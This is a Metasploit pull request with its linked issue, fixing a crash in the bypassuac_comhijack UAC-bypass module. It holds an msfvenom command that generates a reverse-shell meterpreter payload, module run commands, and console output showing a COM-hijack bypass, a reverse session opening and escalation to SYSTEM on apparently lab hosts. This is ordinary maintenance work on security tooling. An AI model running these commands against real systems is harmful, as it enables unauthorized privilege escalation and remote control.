### PR TITLE
Fix bypassuac_comhijack module crash

### LINKED ISSUE #18206: Exploit Error
## Steps to reproduce

How'd you do it?

1. background
2. use exploit windows/local/bypassuac_comhijack
3. set SESSION X
4. set LHOST 192.168.32.XXX
5. set LPORT 4444
6. run

This section should also tell us any relevant information about the
environment; for example, if an exploit that used to work is failing,
tell us the victim operating system and service versions.

## Were you following a specific guide/tutorial or reading documentation?

If yes link the guide/tutorial or documentation you were following here, otherwise you may omit this section.

 https://resources.infosecinstitute.com/topic/how-to-attack-windows-10-machine-with-metasploit-on-kali-linux/

## Expected behavior

image

## Current behavior

Screenshot 2023-07-19 162119

### Metasploit version

metasploit v6.3.26-dev- 

##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

```
[framework/core]
loglevel=3
```

</details>

##  Database Configuration

The database contains the following information:
<details>
<summary>Collapse</summary>

```
Session Type: postgresql selected, no connection
```

</details>

##  History

The following commands were ran during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

```
107    set loglevel 3
108    msfvenom -p windows/meterpreter/reverse_tcp -a x86 platform windows -f exe LHOST=192.168.32.135 LPORT=4444 -o /root/something32.exe
109    debug
```

</details>

##  Framework Errors

The following framework errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
[07/20/2023 05:53:27] [e(0)] core: Failed to connect to the database: No database YAML file
[07/20/2023 05:54:12] [e(0)] core: Failed to connect to the database: No database YAML file
[07/20/2023 06:08:29] [e(0)] meterpreter: Failed to load extension: uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
[07/20/2023 06:08:29] [e(0)] core: NameError uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
[07/20/2023 06:08:29] [e(0)] core: Error loading sysinfo - NoMethodError undefined method `config' for nil:NilClass
[07/20/2023 06:34:55] [e(0)] core: Technique: 0) - Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: 1346
[07/20/2023 06:44:06] [e(0)] core: Exploit failed (windows/local/bypassuac_comhijack): NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e2448e8 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name - NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e2448e8 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name
[07/20/2023 06:46:11] [e(0)] core: Exploit failed (windows/local/bypassuac_comhijack): NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e7a8e10 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name - NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e7a8e10 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name
[07/20/2023 13:42:54] [e(0)] core: Failed to connect to the database: No database YAML file
[07/20/2023 14:25:53] [e(0)] core: Failed to connect to the database: No database YAML file
```

</details>

##  Web Service Errors

The following web service errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Framework Logs

The following framework logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/extension_mapper.rb:28:in `get_extension_id'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/client_core.rb:109:in `get_loaded_extension_commands'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/client_core.rb:346:in `use'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1337:in `block in cmd_load'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1307:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb:1307:in `cmd_load'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/opt/metasploit-framework/embedded/framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:399:in `load_stdapi'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:178:in `bootstrap'
/opt/metasploit-framework/embedded/framework/lib/msf/core/handler.rb:271:in `register_session'
/opt/metasploit-framework/embedded/framework/lib/msf/core/handler.rb:251:in `block in create_session'
/opt/metasploit-framework/embedded/framework/lib/msf/core/session_manager.rb:160:in `block (2 levels) in initialize_scheduler_threads'
/opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[07/20/2023 06:08:29] [e(0)] core: NameError uninitialized constant Rex::Post::Meterpreter::Extensions::Stdapi::Stdapi
[07/20/2023 06:08:29] [e(0)] core: Error loading sysinfo - NoMethodError undefined method `config' for nil:NilClass
[07/20/2023 06:08:29] [d(0)] core: Call stack:
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:416:in `update_session_info'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:465:in `block in load_session_info'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/timeout-0.3.2/lib/timeout.rb:189:in `block in timeout'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/timeout-0.3.2/lib/timeout.rb:36:in `block in catch'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/timeout-0.3.2/lib/timeout.rb:36:in `catch'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/timeout-0.3.2/lib/timeout.rb:36:in `catch'
/opt/metasploit-framework/embedded/lib/ruby/gems/3.0.0/gems/timeout-0.3.2/lib/timeout.rb:198:in `timeout'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:464:in `load_session_info'
/opt/metasploit-framework/embedded/framework/lib/msf/base/sessions/meterpreter.rb:181:in `bootstrap'
/opt/metasploit-framework/embedded/framework/lib/msf/core/handler.rb:271:in `register_session'
/opt/metasploit-framework/embedded/framework/lib/msf/core/handler.rb:251:in `block in create_session'
/opt/metasploit-framework/embedded/framework/lib/msf/core/session_manager.rb:160:in `block (2 levels) in initialize_scheduler_threads'
/opt/metasploit-framework/embedded/framework/lib/msf/core/thread_manager.rb:105:in `block in spawn'
[07/20/2023 06:08:30] [d(0)] core: HistoryManager.push_context name: :meterpreter
[07/20/2023 06:34:55] [e(0)] core: Technique: 0) - Rex::Post::Meterpreter::RequestError priv_elevate_getsystem: Operation failed: 1346
[07/20/2023 06:37:41] [d(0)] core: HistoryManager.pop_context name: :meterpreter
[07/20/2023 06:44:06] [e(0)] core: Exploit failed (windows/local/bypassuac_comhijack): NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e2448e8 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name - NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e2448e8 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name
[07/20/2023 06:46:11] [e(0)] core: Exploit failed (windows/local/bypassuac_comhijack): NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e7a8e10 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name - NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f234e7a8e10 @_major=10, @_minor=0, @_build=19045, @_service_pack=0, @_revision=3208, @product_type=1>
Did you mean?  product_name
[07/20/2023 07:16:29] [w(0)] core: Session 1 has died
[07/20/2023 07:16:29] [w(0)] core: Session 2 has died
[07/20/2023 07:35:11] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[07/20/2023 13:42:54] [e(0)] core: Failed to connect to the database: No database YAML file
[07/20/2023 13:42:59] [d(0)] core: HistoryManager.push_context name: :msfconsole
[07/20/2023 13:48:13] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[07/20/2023 14:25:53] [e(0)] core: Failed to connect to the database: No database YAML file
[07/20/2023 14:26:04] [d(0)] core: HistoryManager.push_context name: :msfconsole
```

</details>

##  Web Service Logs

The following web service logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

```
Framework: 6.3.26-dev-
Ruby: ruby 3.0.2p107 (2021-07-07 revision 0db68f0233) [x86_64-linux]
OpenSSL: OpenSSL 1.1.1m  14 Dec 2021
Install Root: /opt/metasploit-framework/embedded/framework
Session Type: postgresql selected, no connection
Install Method: Omnibus Installer
```

</details>

### PR DESCRIPTION
**Pull request by adfoster-r7**
Closes https://github.com/rapid7/metasploit-framework/issues/18206

### Before

Crash:

```
msf6 exploit(windows/local/bypassuac_comhijack) > run session=-1

[*] Started reverse TCP handler on 192.168.1.178:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed: NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007ff02396de88 @_major=10, @_minor=0, @_build=14393, @_service_pack=0, @product_type=3>
Did you mean?  product_name
[*] Exploit completed, but no session was created.
```

### After

No crash, and a session opens

```
msf6 exploit(windows/local/bypassuac_comhijack) > run session=-1

[-] Handler failed to bind to 192.168.123.1:4444:-  -
[*] Started reverse TCP handler on 0.0.0.0:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows Server 2016+ Build 14393
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Event Viewer via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\vagrant\AppData\Local\Temp\1\OMsoIoWd.dll ...
[*] Executing high integrity process C:\Windows\System32\eventvwr.exe
[*] Sending stage (200774 bytes) to 192.168.1.178
[+] Deleted C:\Users\vagrant\AppData\Local\Temp\1\OMsoIoWd.dll
[*] Meterpreter session 4 opened (192.168.1.178:4444 -> 192.168.1.178:55275) at 2023-07-21 16:49:25 +0100
[*] Cleaning up registry; this can take some time...

meterpreter >
```

### CODE REVIEW

File: modules/exploits/windows/local/bypassuac_dotnet_profiler.rb [hunk 1]
```diff
@@ -63,7 +63,6 @@ def initialize(info = {})
   end
 
   def check
-    get_version_info
```
Comment (adfoster-r7) [inline modules/exploits/windows/local/bypassuac_dotnet_profiler.rb:66]: I think this is just dead code, as `get_version_info` is in `is_uac_enabled?` already

Comment (TheNewbie86) [reply modules/exploits/windows/local/bypassuac_dotnet_profiler.rb:66]: This is all new to me. Am I to replace something for this? If so, where?

**Review by cdelafuente-r7 — APPROVED** [review]

**Comment by cdelafuente-r7** [comment]
Thanks @adfoster-r7 ! this looks good to me. I tested against Windows Server 2016 (Version 1607) and confirmed it fixes the issue. I'll go ahead and land it.

## Before
```
msf6 exploit(windows/local/bypassuac_comhijack) > run session=1 verbose=true

[*] Started reverse TCP handler on 192.168.1.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit failed: NoMethodError undefined method `product' for #<Msf::WindowsVersion:0x00007f7ac8b17d40 @_major=10, @_minor=0, @_build=14393, @_service_pack=0, @_revision=447, @product_type=3>
Did you mean?  product_name
[*] Exploit completed, but no session was created.
```

## After
```
msf6 exploit(windows/local/bypassuac_comhijack) > sessions -1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WIN2016SQL\nutmeg
meterpreter > sysinfo
Computer        : WIN2016SQL
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: 1346 The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)
[-] Named Pipe Impersonation (PrintSpooler variant)
[-] Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/local/bypassuac_comhijack) > run session=1 verbose=true

[*] Started reverse TCP handler on 192.168.1.7:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] System OS Detected: Windows Server 2016+ Build 14393
[+] The target appears to be vulnerable.
[*] Checking admin status...
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\nutmeg\AppData\Local\Temp\2\BMbiRhrO.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200774 bytes) to 192.168.1.7
[+] Deleted C:\Users\nutmeg\AppData\Local\Temp\2\BMbiRhrO.dll
[*] Meterpreter session 2 opened (192.168.1.7:4444 -> 192.168.1.7:54705) at 2023-08-01 14:42:46 +0200
[*] Cleaning up registry; this can take some time...

meterpreter > sysinfo
Computer        : WIN2016SQL
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : MYLAB
Logged On Users : 8
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN2016SQL\nutmeg
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```

**Comment by cdelafuente-r7** [comment]
# Release Notes
This fixes an issue in the `windows/local/bypassuac_comhijack` exploit module, which was breaking due to a syntax error.
